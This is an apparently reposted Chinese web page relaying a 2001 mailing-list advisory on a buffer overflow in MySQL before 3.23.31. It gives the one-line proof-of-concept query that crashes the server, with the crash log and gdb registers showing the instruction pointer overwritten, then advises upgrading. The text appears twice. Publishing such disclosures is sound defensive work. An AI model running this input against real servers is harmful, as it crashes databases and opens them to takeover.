MySQL3.23.31之前版本的安全漏洞
来源:互联网 发布:廊坊润泽公司大数据 编辑:程序博客网 时间:2024/06/06 17:01
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:
步骤:
在第一个终端上启动 MySQL:
spike:/var/MySQL # /sbin/init.d/MySQL start
在另外一个终端上输入:
jroberto@spike:~ > MySQL -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
Enter password:
(没有反应?按^C退出)
在第一台终端上会显示:
spike:/var/MySQL # /usr/bin/safe_MySQLd: line 149: 15557 Segmentation fault
nohup
$ledir/MySQLd --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1>
Number of processes running now: 0
MySQLd restarted on Fri Jan 12 07:10:54 WET 2001
MySQLd daemon ended
使用 gdb 显示结果如下:
(gdb) run
Starting program: /usr/sbin/MySQLd
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/MySQLd: ready for connections
[New Thread 16916]
[Switching to Thread 16916]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
其中的 eip 指示就是缓冲溢出了。
解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 160x600, 创建于 08-4-23MSDN */google_ad_slot = "4367022601";google_ad_width = 160;google_ad_height = 600;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 MySQLd 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。 下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:
步骤:
在第一个终端上启动 MySQL:
spike:/var/MySQL # /sbin/init.d/MySQL start
在另外一个终端上输入:
jroberto@spike:~ > MySQL -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
Enter password:
(没有反应?按^C退出)
在第一台终端上会显示:
spike:/var/MySQL # /usr/bin/safe_MySQLd: line 149: 15557 Segmentation fault
nohup
$ledir/MySQLd --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
g "$@" >>$err_log 2>&1>
Number of processes running now: 0
MySQLd restarted on Fri Jan 12 07:10:54 WET 2001
MySQLd daemon ended
使用 gdb 显示结果如下:
(gdb) run
Starting program: /usr/sbin/MySQLd
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/MySQLd: ready for connections
[New Thread 16916]
[Switching to Thread 16916]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x1 1
ecx 0x68 104
edx 0x8166947 135686471
ebx 0x41414141 1094795585
esp 0xbf5ff408 0xbf5ff408
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10246 66118
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
其中的 eip 指示就是缓冲溢出了。
解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript"><!--google_ad_client = "pub-2947489232296736";/* 160x600, 创建于 08-4-23MSDN */google_ad_slot = "4367022601";google_ad_width = 160;google_ad_height = 600;//--></script><script type="text/javascript"src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
- MySQL3.23.31之前版本的安全漏洞
- MySQL3
- git恢复之前的版本
- 关于elasticsearch1.4.3以下版本安全漏洞的攻击过程复现
- 3.23.31之前版本的漏洞
- Android APK 签名(1.5之前的版本)
- windows 7版本之前的区别
- 关于2.2版本之前的流量统计
- 使用github如何返回之前的版本
- Python改回之前版本的方法
- ubuntu如何降级到之前的版本
- 如何下载之前版本的xcode
- git 切换到之前的版本上
- jtds兼容SQLServer2012以及之前的版本
- svn中如何checkout之前的版本
- git回退到之前的版本
- iOS7之后的版本兼容之前的版本
- MySQL3.23.15后版本设置数据同步(镜像数据库)
- 通过mysql入侵NT和win2000
- 详细教你如何使用delphi中thread的线程编程
- CSS基础学习:样式表CSS简明教程
- MySQL安全问题(匿名用户)的一点心得
- progressbar的填充颜色的改变
- MySQL3.23.31之前版本的安全漏洞
- XHTMLCSS:调用样式表
- 如何控制其他程序窗体上的窗口控件:中
- MySQL安全性指南(2)
- 怎样使MySQL安全以对抗解密高手
- 用winspool取得本机安装的打印机的详细信息
- 设计一个基于CSS的网页模板
- MySQL安全性指南 (2)(转)
- 取得某一dll所有输出函数名